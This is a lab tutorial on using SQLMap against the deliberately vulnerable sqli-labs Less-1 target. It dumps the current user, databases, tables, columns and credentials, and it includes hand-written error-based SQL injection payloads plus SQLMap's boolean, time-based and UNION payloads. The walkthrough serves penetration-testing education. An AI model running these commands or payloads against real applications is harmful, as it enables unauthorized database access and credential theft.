Dumping The Data (in an error-based scenario) via SQLMap

If you have worked through the previous chapter, you already have a basic understanding of SQLMap usage.

  • Learn More: Detect and Exploit SQL Injection Using SQLMap

This tutorial demonstrates how to detect and exploit SQL injection vulnerabilities using SQLMap, a powerful open-source penetration testing tool, with step-by-step instructions on installing it and using it to identify and exploit SQL injection in web applications.


In this chapter, we are going to dump data in an error-based scenario.

Let's go back to the previously discussed example, the sqli-labs Less-1 target. Here, we shall exploit the vulnerability with SQLMap's error-based technique, first to identify the database user and then to list the databases. One caveat before we start: SQLMap decides for itself which of the detected techniques to use for each request, preferring the most efficient one it has (UNION before error-based, error-based before blind). Because this target also has a UNION injection point in the stored session, the commands below will not necessarily retrieve data through the error-based channel unless you restrict SQLMap with --technique=E.

┌──(kali㉿kali)-[~]
└─$ sqlmap -u http://192.168.56.108/sqli-labs-master/Less-1/?id=4 --current-user

The output is shown below:

[12:36:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.6.39, Apache 2.4.37
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:36:26] [INFO] fetching current user
current user: 'root@localhost'
[12:36:26] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.108'

Impressive! The current database user reported by SQLMap is root@localhost, i.e. the application connects as the MySQL superuser, so everything the injection can reach, it reaches with full privileges.

Now let us list the databases present using the --dbs switch.

┌──(kali㉿kali)-[~]
└─$ sqlmap -u http://192.168.56.108/sqli-labs-master/Less-1/?id=4 --dbs 

The output is shown below:

available databases [7]:                                                                                                      
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] security
[*] test

We have now found seven databases. Three of them are MySQL/MariaDB system databases ("information_schema", "mysql" and "performance_schema"), "test" is the empty sample database that older MySQL/MariaDB installations create by default, "phpmyadmin" belongs to the phpMyAdmin installation on this server, and "challenges" and "security" are the two databases created by sqli-labs itself.

Once we have the list of databases available, the next step is to dump one of them.

For demonstration, I'll select the security database and list the tables inside it. SQLMap provides the --tables switch for this, and it should be combined with the -D switch, which tells SQLMap which database to enumerate; without -D, --tables walks every database it can see, which is slow and noisy.

┌──(kali㉿kali)-[~]
└─$ sqlmap -u http://192.168.56.108/sqli-labs-master/Less-1/?id=4 -D security --tables

The output is shown below:

Database: security                                                                                                            
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+

The --tables switch instructs SQLMap to enumerate the tables of the security database; it found four.

Now that the tables are at our disposal, let us dump the data from the users table. We use the --dump switch together with -D and -T, which name the database and the table to dump respectively. (Enumerating columns first is covered further down.)

┌──(kali㉿kali)-[~]
└─$ sqlmap -u http://192.168.56.108/sqli-labs-master/Less-1/?id=4 -D security -T users --dump

The output is shown below:

Database: security                                                                                                            
Table: users
[13 entries]
+----+------------+----------+
| id | password   | username |
+----+------------+----------+
| 1  | Dumb       | Dumb     |
| 2  | I-kill-you | Angelina |
| 3  | p@ssword   | Dummy    |
| 4  | crappy     | secure   |
| 5  | stupidity  | stupid   |
| 6  | genious    | superman |
| 7  | mob!le     | batman   |
| 8  | admin      | admin    |
| 9  | admin1     | admin1   |
| 10 | admin2     | admin2   |
| 11 | admin3     | admin3   |
| 12 | dumbo      | dhakkan  |
| 14 | admin4     | admin4   |
+----+------------+----------+

Look at that, we have successfully extracted the data from the table. Sometimes we are only interested in specific columns rather than all of them.

For example, in the output above we may want only the username and password columns and not waste requests dumping the id column. With the error-based or blind techniques every value costs at least one injected request (long values cost several), so trimming columns is a real saving on large tables.

To dump specific columns we use the -C switch. First, however, we use --columns to print the column names and types without dumping anything, and then pass the chosen names to -C.

┌──(kali㉿kali)-[~]
└─$ sqlmap -u http://192.168.56.108/sqli-labs-master/Less-1/?id=4 -D security -T users --columns

The output is shown below:

Database: security                                                                                                            
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+

Great! We've got the exact column structure, now let us select the username and password columns, and dump from only these two columns.

┌──(kali㉿kali)-[~]
└─$ sqlmap -u http://192.168.56.108/sqli-labs-master/Less-1/?id=4 -D security -T users -C "username,password" --dump

The output is shown below:

Database: security                                                                                                            
Table: users
[13 entries]
+----------+------------+
| username | password   |
+----------+------------+
| Dumb     | Dumb       |
| Angelina | I-kill-you |
| Dummy    | p@ssword   |
| secure   | crappy     |
| stupid   | stupidity  |
| superman | genious    |
| batman   | mob!le     |
| admin    | admin      |
| admin1   | admin1     |
| admin2   | admin2     |
| admin3   | admin3     |
| dhakkan  | dumbo      |
| admin4   | admin4     |
+----------+------------+

There we have it! This output contains only the username and password columns. As the syntax shows, -C takes a comma-separated list of column names.
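The SQL below is an added example, not output from the page's lab and not SQLMap's own code. It shows what the error-based technique actually sends for each of the steps above (--current-user, --dbs, -D --tables, -D -T --columns and -D -T -C --dump) against the security database listed above. It assumes a MySQL/MariaDB back end and that the Less-1 query is SELECT * FROM users WHERE id='<id>' LIMIT 0,1 (that is the sqli-labs source; it is assumed here, not shown on the page). The '~' delimiters and the ORDER BY clauses are my choices for readability, not SQLMap's.

```sql
-- Added example (not from the original post or from SQLMap): the queries behind
-- SQLMap's error-based enumeration of the sqli-labs "security" database.
-- Assumed back-end query (sqli-labs Less-1):
--     SELECT * FROM users WHERE id='<id>' LIMIT 0,1
-- Assumed DBMS: MySQL / MariaDB.

-- 1. The primitive. Grouping on a string that ends in FLOOR(RAND(0)*2) is
--    deterministic (seeded RAND gives 0,1,1,0,1,1,...) and collides when the
--    GROUP BY temp table sees its third row, so the server raises ERROR 1062
--    and echoes the grouped string, which we control, back in the error text.
--    information_schema.PLUGINS is there only to supply three or more rows.
SELECT COUNT(*), CONCAT('~', (SELECT USER()), '~', FLOOR(RAND(0)*2)) AS x
FROM information_schema.PLUGINS
GROUP BY x;
-- ERROR 1062 (23000): Duplicate entry '~root@localhost~1' for key 'group_key'

-- 2. The same primitive as it reaches the database via ?id=4' AND (...) AND '1'='1
--    This is the shape of the "(FLOOR)" payload SQLMap reports as its
--    error-based injection point; SQLMap's 0x71... hex strings are delimiters
--    like the '~' used here, written in hex so no quotes are needed.
--                                                              (--current-user)
SELECT * FROM users WHERE id='4' AND (SELECT 1 FROM (
  SELECT COUNT(*), CONCAT('~', (SELECT USER()), '~', FLOOR(RAND(0)*2)) AS x
  FROM information_schema.PLUGINS GROUP BY x) a) AND '1'='1' LIMIT 0,1;

-- 3. --dbs: one database name per request, stepping LIMIT 0,1 / 1,1 / 2,1 ...
SELECT * FROM users WHERE id='4' AND (SELECT 1 FROM (
  SELECT COUNT(*), CONCAT('~',
      (SELECT schema_name FROM information_schema.schemata
       ORDER BY schema_name LIMIT 0,1),
      '~', FLOOR(RAND(0)*2)) AS x
  FROM information_schema.PLUGINS GROUP BY x) a) AND '1'='1' LIMIT 0,1;
-- Duplicate entry '~challenges~1' ...   (alphabetically first of the seven)

-- 4. -D security --tables
SELECT * FROM users WHERE id='4' AND (SELECT 1 FROM (
  SELECT COUNT(*), CONCAT('~',
      (SELECT table_name FROM information_schema.tables
       WHERE table_schema='security' ORDER BY table_name LIMIT 0,1),
      '~', FLOOR(RAND(0)*2)) AS x
  FROM information_schema.PLUGINS GROUP BY x) a) AND '1'='1' LIMIT 0,1;
-- Duplicate entry '~emails~1' ...

-- 5. -D security -T users --columns (name and type in one value)
SELECT * FROM users WHERE id='4' AND (SELECT 1 FROM (
  SELECT COUNT(*), CONCAT('~',
      (SELECT CONCAT(column_name, ':', column_type)
       FROM information_schema.columns
       WHERE table_schema='security' AND table_name='users'
       ORDER BY ordinal_position LIMIT 0,1),
      '~', FLOOR(RAND(0)*2)) AS x
  FROM information_schema.PLUGINS GROUP BY x) a) AND '1'='1' LIMIT 0,1;
-- Duplicate entry '~id:int(3)~1' ...

-- 6. -D security -T users -C "username,password" --dump: one row per request
SELECT * FROM users WHERE id='4' AND (SELECT 1 FROM (
  SELECT COUNT(*), CONCAT('~',
      (SELECT CONCAT(username, ':', password) FROM security.users
       ORDER BY id LIMIT 1,1),
      '~', FLOOR(RAND(0)*2)) AS x
  FROM information_schema.PLUGINS GROUP BY x) a) AND '1'='1' LIMIT 0,1;
-- Duplicate entry '~Angelina:I-kill-you~1' ...
```

Two practical consequences follow from this. MySQL truncates the value echoed in a Duplicate entry error to 64 characters, which is why SQLMap fetches longer strings in MID() chunks over several requests; and every value costs its own request, so the per-row cost of --dump and the per-table cost of --dump-all add up quickly. When the web server hides database errors (no error text in the response), this channel is gone and SQLMap falls back to boolean- or time-based blind extraction, which is slower still.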


Interacting with the wizard

If the commands above look complicated, then, for basic familiarity, there is an interactive setup wizard in which SQLMap asks for each setting one at a time, starting with the injection URL.

The --wizard switch invokes the wizard.

┌──(kali㉿kali)-[~]
└─$ sqlmap --wizard                                                                                                 
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.6.7#stable}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:46:02 /2022-12-06/

[12:46:02] [INFO] starting wizard interface
Please enter full target URL (-u):

The wizard then prompts for each setting in turn; answer as required. A run with the defaults looks like this:

Please enter full target URL (-u): http://192.168.56.108/sqli-labs-master/Less-1/?id=4
POST data (--data) [Enter for None]: 
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Intermediate
[3] All
> 1

sqlmap is running, please wait..

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=4' AND 5978=5978 AND 'yBkh'='yBkh

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=4' AND (SELECT 7029 FROM(SELECT COUNT(*),CONCAT(0x71766b7871,(SELECT (ELT(7029=7029,1))),0x71716a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'pqQq'='pqQq

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=4' AND (SELECT 2736 FROM (SELECT(SLEEP(5)))haHG) AND 'MBbF'='MBbF

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-6733' UNION ALL SELECT NULL,NULL,CONCAT(0x71766b7871,0x6e7a796f655346646f704c4c6167654b6c666177674254694d6456497a5851767371434e5467736a,0x71716a6a71)-- -
---
web server operating system: Windows
web application technology: PHP 5.6.39, Apache 2.4.37
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
banner: '10.1.37-MariaDB'
current user: 'root@localhost'
current database: 'security'
current user is DBA: True

[*] ending @ 12:46:34 /2022-12-06/

It produces a basic report for the chosen enumeration level: the banner, the current user, the current database the injected query runs in, and whether or not the current user is a database administrator (DBA). Because this target had already been tested from the same machine, SQLMap resumed the injection points from its stored session (note the "resumed the following injection point(s)" line) instead of re-running detection; use --flush-session if you want it to test from scratch.


Dump everything!

There is an SQLMap option named --dump-all which dumps all the data in every database reachable through the injection, including system databases such as information_schema and mysql. Pair it with --exclude-sysdbs to skip those system databases, which are large and rarely of interest.

┌──(kali㉿kali)-[~]
└─$ sqlmap -u http://192.168.56.108/sqli-labs-master/Less-1/?id=4 --dump-all

This command extracts everything reachable through the injection. Dumping every database takes a long time (at least one request per value with the error-based technique, and per character or bit with the blind ones, multiplied by every row of every table), so it is generally not recommended, and it may even disrupt the web application if server resources are constrained. Prefer targeted -D/-T/-C dumps, and remember that whatever you dump ends up in clear text under SQLMap's output directory.
